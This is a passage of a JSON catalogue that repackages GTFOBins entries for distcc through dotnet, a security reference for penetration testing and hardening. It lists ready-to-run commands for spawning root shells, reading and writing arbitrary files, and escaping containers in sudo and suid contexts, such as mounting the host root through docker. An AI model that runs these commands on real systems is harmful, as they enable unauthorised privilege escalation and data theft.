execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:sudo","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:suid","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:distcc:shell:0:unprivileged","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/distcc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:file-read:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmesg:inherit:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmidecode:file-write:0:unprivileged","toolId":"gtfo:dmidecode","toolName":"dmidecode","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dmidecode --no-sysfs -d x.dmi --dump-bin /path/to/output-file","description":"It can be used to write files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\necho DATA >/path/to/temp-file\n./dmiwrite /path/to/temp-file x.dmi\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:sudo","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:suid","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dmsetup:shell:0:unprivileged","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnf:command:0:sudo","toolId":"gtfo:dnf","toolName":"dnf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnf install -y x-1.0-1.noarch.rpm --disablerepo=*","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```\n\nThe `--disablerepo=*` option is used for targets without Internet connectivity, can be omitted otherwise.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:sudo","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:suid","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dnsmasq:command:0:unprivileged","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:doas:shell:0:sudo","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/doas/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:doas:shell:0:unprivileged","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/doas/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-read:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:file-write:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:docker:shell:1:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-read:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dos2unix:file-write:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-read:1:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dosbox:file-write:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:file-read:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:file-read:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:dotnet:shell:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dotnet 